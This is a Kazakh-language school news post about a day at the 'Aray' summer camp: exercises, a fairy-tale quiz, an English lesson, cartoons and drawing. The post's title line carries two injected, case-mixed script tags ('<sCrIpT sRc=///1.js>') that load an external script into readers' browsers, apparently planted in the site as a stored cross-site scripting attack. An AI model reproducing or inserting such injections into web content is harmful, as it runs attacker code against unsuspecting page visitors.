«Арай» жазғы лагерінің 2-маусымының екінші күні өтті.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
17.06.2022
Балаларды қарсы алып, дене шынықтыру мұғалімі Игорь Николаевич таза ауада жаттығулар жасатып, қызықты спорттық ойындар ойнатты. Ғажайыпқа толы ертегі, әңгімелер оқып сергігеннен соң, қазақ тілі мен әдебиеті мұғалімі Нурсулу Олжабаевна балалармен «Мен бәрін білемін» викторина сабағын өткізді. Сабағымыз Мақта қыз бен мысық ертегісінің сюжеті бойынша өтті. Мақсаты: логикалық сұрақтарға жауап бере отырып есте сақтау, қабылдау, ойлау қабілетін дамыту. Сөздік қорларын молайту. Ұйымшылдыққа, ұқыптылыққа, әдемілікке тәрбиелеу.
Түскі астан соң ағылшын пәнінің мұғалімі Зарина Амановна «Funny English» ағылшын тілі сабағын өткізді. Сабақ ойын түрінде өтті, өлең айтты, сөздерді қайталады.
Сонымен қатар оқушылар мультфильмдер тамашалап, суреттер салды. Балалардың бұл күндері де қызыққа толы болды.
Просмотров: 547